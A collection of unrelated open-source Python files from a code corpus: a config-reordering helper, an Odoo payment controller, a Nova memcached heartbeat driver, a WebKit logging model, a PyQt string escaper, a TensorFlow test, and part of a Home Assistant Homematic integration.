def __repr__(self):
return self.key
def getvar(self):
"""
Find variable in a string.
"""
variable = "".join(self.value.split("$")[1:])
variable = variable.split("/")[0]
return variable
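# Illustrative examples: Option('a', '$base/subdir').getvar() returns 'base',
# while a value containing no '$' yields the empty string.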
def reorder(fname):
"""
Reorder fields in a configuration file so that
assignments of variables come before their use.
"""
fp = open(fname, 'r+')
options = Options()
configresult = {}
section = ""
configresult[section] = Options()
for line in fp.readlines():
line = line.strip()
if line.startswith("["):
# New section
section = line
configresult[section] = Options()
elif line.startswith("#"):
pass
# Lonely comments are removed
else:
# Store an option
try:
key, value = line.split("=")
configresult[section].insert(Option(key, value))
except ValueError:
pass # Ignore all weird lines
fp.seek(0)
fp.truncate()
for section in configresult:
fp.write("{}\n".format(section))
configresult[section].sort() # Sort options in this section
for option in configresult[section].options:
fp.write("{}={}\n".format(option.key, option.value))
fp.close()
| apache-2.0 |
salaria/odoo | addons/payment_authorize/controllers/main.py | 247 | 1261 | # -*- coding: utf-8 -*-
import pprint
import logging
import urlparse
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class AuthorizeController(http.Controller):
_return_url = '/payment/authorize/return/'
_cancel_url = '/payment/authorize/cancel/'
@http.route([
'/payment/authorize/return/',
'/payment/authorize/cancel/',
], type='http', auth='public')
def authorize_form_feedback(self, **post):
_logger.info('Authorize: entering form_feedback with post data %s', pprint.pformat(post))
return_url = '/'
if post:
request.env['payment.transaction'].sudo().form_feedback(post, 'authorize')
return_url = post.pop('return_url', '/')
base_url = request.env['ir.config_parameter'].get_param('web.base.url')
# Authorize.Net is expecting a response to the POST sent by their server.
# This response is in the form of a URL that Authorize.Net will pass on to
# the client's browser to redirect them to the desired location; the
# redirect itself needs javascript.
return request.render('payment_authorize.payment_authorize_redirect', {
'return_url': '%s' % urlparse.urljoin(base_url, return_url)
})
| agpl-3.0 |
CEG-FYP-OpenStack/scheduler | nova/servicegroup/drivers/mc.py | 7 | 3516 | # Service heartbeat driver using Memcached
# Copyright (c) 2013 Akira Yoshiyama <akirayoshiyama at gmail dot com>
#
# This is derived from nova/servicegroup/drivers/db.py.
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from nova import cache_utils
from nova.i18n import _, _LI, _LW
from nova.servicegroup import api
from nova.servicegroup.drivers import base
CONF = cfg.CONF
CONF.import_opt('service_down_time', 'nova.service')
LOG = logging.getLogger(__name__)
class MemcachedDriver(base.Driver):
def __init__(self, *args, **kwargs):
self.mc = cache_utils.get_memcached_client(
expiration_time=CONF.service_down_time)
def join(self, member_id, group_id, service=None):
"""Join the given service with its group."""
LOG.debug('Memcached_Driver: join new ServiceGroup member '
'%(member_id)s to the %(group_id)s group, '
'service = %(service)s',
{'member_id': member_id,
'group_id': group_id,
'service': service})
if service is None:
raise RuntimeError(_('service is a mandatory argument for '
'Memcached based ServiceGroup driver'))
report_interval = service.report_interval
if report_interval:
service.tg.add_timer(report_interval, self._report_state,
api.INITIAL_REPORTING_DELAY, service)
def is_up(self, service_ref):
"""Moved from nova.utils
Check whether a service is up based on last heartbeat.
"""
key = "%(topic)s:%(host)s" % service_ref
is_up = self.mc.get(str(key)) is not None
if not is_up:
LOG.debug('Seems service %s is down', key)
return is_up
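# Illustrative: for service_ref {'topic': 'compute', 'host': 'node1'}, the
# presence of memcached key 'compute:node1' (auto-expired after
# CONF.service_down_time seconds) marks the service as up.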
def _report_state(self, service):
"""Update the state of this service in the datastore."""
try:
key = "%(topic)s:%(host)s" % service.service_ref
# memcached has data expiration time capability.
# set(..., time=CONF.service_down_time) uses it and
# reduces key-deleting code.
self.mc.set(str(key),
timeutils.utcnow())
# TODO(termie): make this pattern be more elegant.
if getattr(service, 'model_disconnected', False):
service.model_disconnected = False
LOG.info(
_LI('Recovered connection to memcache server '
'for reporting service status.'))
# TODO(vish): this should probably only catch connection errors
except Exception:
if not getattr(service, 'model_disconnected', False):
service.model_disconnected = True
LOG.warn(_LW('Lost connection to memcache server '
'for reporting service status.'))
| apache-2.0 |
jkburges/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/model/warninglog.py | 122 | 2147 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from time import time
from datetime import datetime
from google.appengine.ext import db
class WarningLog(db.Model):
date = db.DateTimeProperty(auto_now_add=True)
event = db.StringProperty()
message = db.StringProperty()
attachment_id = db.IntegerProperty()
queue_name = db.StringProperty()
bot_id = db.StringProperty()
@classmethod
def record(cls, event, message=None, attachment_id=None, queue_name=None, bot_id=None):
entity = cls(event=event, message=message, queue_name=queue_name, bot_id=bot_id, attachment_id=attachment_id)
entity.put()
return entity
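# Example usage (illustrative; the values below are hypothetical):
#   WarningLog.record('patch-retry', message='bot timed out',
#                     attachment_id=12345, queue_name='commit-queue',
#                     bot_id='bot-1')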
| bsd-3-clause |
pyqt/python-qt5 | PyQt5/uic/port_v2/as_string.py | 2 | 1435 | #############################################################################
##
## Copyright (c) 2016 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## info@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import re
def as_string(obj):
if isinstance(obj, basestring):
return '"' + _escape(obj.encode('UTF-8')) + '"'
return str(obj)
_esc_regex = re.compile(r"(\"|\'|\\)")
def _escape(text):
# This escapes any escaped single or double quote or backslash.
x = _esc_regex.sub(r"\\\1", text)
# This replaces any '\n' with an escaped version and a real line break.
return re.sub(r'\n', r'\\n"\n"', x)
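# Illustrative behaviour (a sketch; assumes Python 2, where `basestring`
# exists):
#   as_string(42) -> '42'
#   as_string(u'a"b') -> '"a\\"b"' (the inner quote is backslash-escaped)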
| gpl-3.0 |
rabipanda/tensorflow | tensorflow/contrib/timeseries/python/timeseries/state_space_models/filtering_postprocessor_test.py | 67 | 3176 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for filtering postprocessors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.timeseries.python.timeseries.state_space_models import filtering_postprocessor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class FilteringStepPostprocessorTest(test.TestCase):
def test_gaussian_alternative(self):
for float_dtype in [dtypes.float32, dtypes.float64]:
detector = filtering_postprocessor.StateInterpolatingAnomalyDetector(
anomaly_log_likelihood=(filtering_postprocessor
.cauchy_alternative_to_gaussian),
responsibility_scaling=10.)
predicted_state = [
constant_op.constant(
[[40.], [20.]], dtype=float_dtype), constant_op.constant(
[3., 6.], dtype=float_dtype), constant_op.constant([-1, -2])
]
filtered_state = [
constant_op.constant(
[[80.], [180.]], dtype=float_dtype), constant_op.constant(
[1., 2.], dtype=float_dtype), constant_op.constant([-1, -2])
]
interpolated_state, updated_outputs = detector.process_filtering_step(
current_times=constant_op.constant([1, 2]),
current_values=constant_op.constant([[0.], [1.]], dtype=float_dtype),
predicted_state=predicted_state,
filtered_state=filtered_state,
outputs={
"mean":
constant_op.constant([[0.1], [10.]], dtype=float_dtype),
"covariance":
constant_op.constant([[[1.0]], [[1.0]]], dtype=float_dtype),
"log_likelihood":
constant_op.constant([-1., -40.], dtype=float_dtype)
})
# The first batch element is not anomalous, and so should use the inferred
# state. The second is anomalous, and should use the predicted state.
expected_state = [[[80.], [20.]],
[1., 6.],
[-1, -2]]
with self.test_session():
for interpolated, expected in zip(interpolated_state, expected_state):
self.assertAllClose(expected, interpolated.eval())
self.assertGreater(0., updated_outputs["anomaly_score"][0].eval())
self.assertLess(0., updated_outputs["anomaly_score"][1].eval())
if __name__ == "__main__":
test.main()
| apache-2.0 |
miniconfig/home-assistant | homeassistant/components/homematic.py | 5 | 28822 | """
Support for Homematic devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/homematic/
"""
import os
import time
import logging
from datetime import timedelta
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN, CONF_USERNAME, CONF_PASSWORD,
CONF_PLATFORM, CONF_HOSTS, CONF_NAME, ATTR_ENTITY_ID)
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import track_time_interval
from homeassistant.config import load_yaml_config_file
DOMAIN = 'homematic'
REQUIREMENTS = ["pyhomematic==0.1.22"]
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_NAME = 'name'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_PROXY = 'proxy'
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VAR_VALUE = 'set_var_value'
SERVICE_SET_DEV_VALUE = 'set_dev_value'
HM_DEVICE_TYPES = {
DISCOVER_SWITCHES: [
'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch',
'IPSwitchPowermeter', 'KeyMatic', 'HMWIOSwitch'],
DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer'],
DISCOVER_SENSORS: [
'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch'],
DISCOVER_CLIMATE: [
'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
'MAXWallThermostat', 'IPThermostat'],
DISCOVER_BINARY_SENSORS: [
'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
'RemoteMotion', 'WeatherSensor', 'TiltSensor', 'IPShutterContact',
'HMWIOSwitch', 'MaxShutterContact'],
DISCOVER_COVER: ['Blind', 'KeyBlind']
}
HM_IGNORE_DISCOVERY_NODE = [
'ACTUAL_TEMPERATURE',
'ACTUAL_HUMIDITY'
]
HM_ATTRIBUTE_SUPPORT = {
'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
'RSSI_DEVICE': ['rssi', {}],
'VALVE_STATE': ['valve', {}],
'BATTERY_STATE': ['battery', {}],
'CONTROL_MODE': ['mode', {0: 'Auto', 1: 'Manual', 2: 'Away', 3: 'Boost'}],
'POWER': ['power', {}],
'CURRENT': ['current', {}],
'VOLTAGE': ['voltage', {}],
'WORKING': ['working', {0: 'No', 1: 'Yes'}],
}
HM_PRESS_EVENTS = [
'PRESS_SHORT',
'PRESS_LONG',
'PRESS_CONT',
'PRESS_LONG_RELEASE',
'PRESS',
]
HM_IMPULSE_EVENTS = [
'SEQUENCE_OK',
]
_LOGGER = logging.getLogger(__name__)
CONF_RESOLVENAMES_OPTIONS = [
'metadata',
'json',
'xml',
False
]
DATA_HOMEMATIC = 'homematic'
DATA_DELAY = 'homematic_delay'
DATA_DEVINIT = 'homematic_devinit'
DATA_STORE = 'homematic_store'
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_IP = 'ip'
CONF_PORT = 'port'
CONF_CALLBACK_IP = "callback_ip"
CONF_CALLBACK_PORT = "callback_port"
CONF_RESOLVENAMES = 'resolvenames'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_DELAY = 'delay'
CONF_PRIMARY = 'primary'
DEFAULT_LOCAL_IP = "0.0.0.0"
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_PORT = 2001
DEFAULT_USERNAME = "Admin"
DEFAULT_PASSWORD = ""
DEFAULT_VARIABLES = False
DEFAULT_DEVICES = True
DEFAULT_DELAY = 0.5
DEFAULT_PRIMARY = False
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): "homematic",
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_ADDRESS): cv.string,
vol.Required(ATTR_PROXY): cv.string,
vol.Optional(ATTR_CHANNEL, default=1): vol.Coerce(int),
vol.Optional(ATTR_PARAM): cv.string,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOSTS): {cv.match_all: {
vol.Required(CONF_IP): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT):
cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_VARIABLES, default=DEFAULT_VARIABLES):
cv.boolean,
vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
vol.In(CONF_RESOLVENAMES_OPTIONS),
vol.Optional(CONF_DEVICES, default=DEFAULT_DEVICES): cv.boolean,
vol.Optional(CONF_PRIMARY, default=DEFAULT_PRIMARY): cv.boolean,
vol.Optional(CONF_CALLBACK_IP): cv.string,
vol.Optional(CONF_CALLBACK_PORT): cv.port,
}},
vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
vol.Optional(CONF_LOCAL_PORT, default=DEFAULT_LOCAL_PORT): cv.port,
vol.Optional(CONF_DELAY, default=DEFAULT_DELAY): vol.Coerce(float),
}),
}, extra=vol.ALLOW_EXTRA)
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): cv.string,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_SET_VAR_VALUE = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})
SCHEMA_SERVICE_SET_DEV_VALUE = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_RECONNECT = vol.Schema({})
def virtualkey(hass, address, channel, param, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_VIRTUALKEY, data)
def set_var_value(hass, entity_id, value):
"""Change value of homematic system variable."""
data = {
ATTR_ENTITY_ID: entity_id,
ATTR_VALUE: value,
}
hass.services.call(DOMAIN, SERVICE_SET_VAR_VALUE, data)
def set_dev_value(hass, address, channel, param, value, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_VALUE: value,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_SET_DEV_VALUE, data)
def reconnect(hass):
"""Reconnect to CCU/Homegear."""
hass.services.call(DOMAIN, SERVICE_RECONNECT, {})
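# Illustrative use of the helpers above from custom code (hass is assumed to
# be a running Home Assistant instance; the address and param are examples):
#   virtualkey(hass, 'ABC0000001', 1, 'PRESS_SHORT')
#   set_dev_value(hass, 'ABC0000001', 1, 'STATE', True)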
# pylint: disable=unused-argument
def setup(hass, config):
"""Setup the Homematic component."""
from pyhomematic import HMConnection
hass.data[DATA_DELAY] = config[DOMAIN].get(CONF_DELAY)
hass.data[DATA_DEVINIT] = {}
hass.data[DATA_STORE] = []
# create hosts list for pyhomematic
remotes = {}
hosts = {}
for rname, rconfig in config[DOMAIN][CONF_HOSTS].items():
server = rconfig.get(CONF_IP)
remotes[rname] = {}
remotes[rname][CONF_IP] = server
remotes[rname][CONF_PORT] = rconfig.get(CONF_PORT)
remotes[rname][CONF_RESOLVENAMES] = rconfig.get(CONF_RESOLVENAMES)
remotes[rname][CONF_USERNAME] = rconfig.get(CONF_USERNAME)
remotes[rname][CONF_PASSWORD] = rconfig.get(CONF_PASSWORD)
remotes[rname]['callbackip'] = rconfig.get(CONF_CALLBACK_IP)
remotes[rname]['callbackport'] = rconfig.get(CONF_CALLBACK_PORT)
if server not in hosts or rconfig.get(CONF_PRIMARY):
hosts[server] = {
CONF_VARIABLES: rconfig.get(CONF_VARIABLES),
CONF_NAME: rname,
}
hass.data[DATA_DEVINIT][rname] = rconfig.get(CONF_DEVICES)
# Create server thread
bound_system_callback = partial(_system_callback_handler, hass, config)
hass.data[DATA_HOMEMATIC] = HMConnection(
local=config[DOMAIN].get(CONF_LOCAL_IP),
localport=config[DOMAIN].get(CONF_LOCAL_PORT),
remotes=remotes,
systemcallback=bound_system_callback,
interface_id="homeassistant"
)
# Start server thread, connect to peer, initialize to receive events
hass.data[DATA_HOMEMATIC].start()
# Stop the server when Home Assistant is shutting down
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)
# init homematic hubs
entity_hubs = []
for _, hub_data in hosts.items():
entity_hubs.append(HMHub(
hass, hub_data[CONF_NAME], hub_data[CONF_VARIABLES]))
# register homematic services
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def _hm_service_virtualkey(service):
"""Service handle virtualkey services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found for service virtualkey!", address)
return
# if param exists for this device
if param not in hmdevice.ACTIONNODE:
_LOGGER.error("%s not datapoint in hm device %s", param, address)
return
# channel exists?
if channel not in hmdevice.ACTIONNODE[param]:
_LOGGER.error("%i is not a channel in hm device %s",
channel, address)
return
# call key
hmdevice.actionNodeData(param, True, channel)
hass.services.register(
DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
descriptions[DOMAIN][SERVICE_VIRTUALKEY],
schema=SCHEMA_SERVICE_VIRTUALKEY)
def _service_handle_value(service):
"""Set value on homematic variable."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
name = service.data[ATTR_NAME]
value = service.data[ATTR_VALUE]
if entity_ids:
entities = [entity for entity in entity_hubs if
entity.entity_id in entity_ids]
else:
entities = entity_hubs
if not entities:
_LOGGER.error("Homematic controller not found!")
return
for hub in entities:
hub.hm_set_variable(name, value)
hass.services.register(
DOMAIN, SERVICE_SET_VAR_VALUE, _service_handle_value,
descriptions[DOMAIN][SERVICE_SET_VAR_VALUE],
schema=SCHEMA_SERVICE_SET_VAR_VALUE)
def _service_handle_reconnect(service):
"""Reconnect to all homematic hubs."""
hass.data[DATA_HOMEMATIC].reconnect()
hass.services.register(
DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
descriptions[DOMAIN][SERVICE_RECONNECT],
schema=SCHEMA_SERVICE_RECONNECT)
def _service_handle_device(service):
"""Service handle set_dev_value services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
value = service.data.get(ATTR_VALUE)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found!", address)
return
# call key
hmdevice.setValue(param, value, channel)
hass.services.register(
DOMAIN, SERVICE_SET_DEV_VALUE, _service_handle_device,
descriptions[DOMAIN][SERVICE_SET_DEV_VALUE],
schema=SCHEMA_SERVICE_SET_DEV_VALUE)
return True
def _system_callback_handler(hass, config, src, *args):
"""Callback handler."""
if src == 'newDevices':
_LOGGER.debug("newDevices with: %s", args)
# pylint: disable=unused-variable
(interface_id, dev_descriptions) = args
proxy = interface_id.split('-')[-1]
# device support active?
if not hass.data[DATA_DEVINIT][proxy]:
return
##
# Get list of all keys of the devices (ignoring channels)
key_dict = {}
for dev in dev_descriptions:
key_dict[dev['ADDRESS'].split(':')[0]] = True
##
# Remove devices that were already initialized by HA
tmp_devs = key_dict.copy()
for dev in tmp_devs:
if dev in hass.data[DATA_STORE]:
del key_dict[dev]
else:
hass.data[DATA_STORE].append(dev)
# Register EVENTS
# Search all devices with an EVENTNODE that includes data
bound_event_callback = partial(_hm_event_handler, hass, proxy)
for dev in key_dict:
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(dev)
# have events?
if len(hmdevice.EVENTNODE) > 0:
_LOGGER.debug("Register Events from %s", dev)
hmdevice.setEventCallback(callback=bound_event_callback,
bequeath=True)
# If configuration allows autodetection of devices,
# all devices not configured are added.
if key_dict:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, key_dict, proxy)
# When devices of this type are found,
# they are set up in HA and an event is fired
if found_devices:
# Fire discovery event
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
def _get_devices(hass, discovery_type, keys, proxy):
"""Get the Homematic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[proxy][key]
class_name = device.__class__.__name__
metadata = {}
# Class supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata if needed to generate a param list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
if metadata:
# Generate options for 1...n elements with 1...n params
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE:
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_name(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_PROXY: proxy,
ATTR_NAME: name,
ATTR_CHANNEL: channel
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
else:
_LOGGER.debug("Got no params for %s", key)
_LOGGER.debug("%s autodiscovery done: %s", discovery_type, str(device_arr))
return device_arr
def _create_ha_name(name, channel, param, count):
"""Generate a unique object name."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple param first elements
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple param on object with multiple elements
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
def _hm_event_handler(hass, proxy, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# Not an event?
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# keypress event
if attribute in HM_PRESS_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
}))
return
# impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
}))
return
_LOGGER.warning("Event is unknown and not forwarded to HA")
def _device_from_servicecall(hass, service):
"""Extract homematic device from service call."""
address = service.data.get(ATTR_ADDRESS)
proxy = service.data.get(ATTR_PROXY)
if proxy:
return hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
for _, devices in hass.data[DATA_HOMEMATIC].devices.items():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The Homematic hub. I.e. CCU2/HomeGear."""
def __init__(self, hass, name, use_variables):
"""Initialize Homematic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = hass.data[DATA_HOMEMATIC]
self._variables = {}
self._name = name
self._state = STATE_UNKNOWN
self._use_variables = use_variables
# load data
track_time_interval(hass, self._update_hub, SCAN_INTERVAL_HUB)
self._update_hub(None)
if self._use_variables:
track_time_interval(
hass, self._update_variables, SCAN_INTERVAL_VARIABLES)
self._update_variables(None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. Homematic Hub object update variable."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
state = self._homematic.getServiceMessages(self._name)
self._state = STATE_UNKNOWN if state is None else len(state)
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrive all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable on homematic controller."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The Homematic device base object."""
def __init__(self, hass, config):
"""Initialize a generic Homematic device."""
self.hass = hass
self._homematic = hass.data[DATA_HOMEMATIC]
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._proxy = config.get(ATTR_PROXY)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._data = {}
self._hmdevice = None
self._connected = False
self._available = False
# Set param to uppercase
if self._state:
self._state = self._state.upper()
@property
def should_poll(self):
"""Return false. Homematic states are pushed by the XML RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
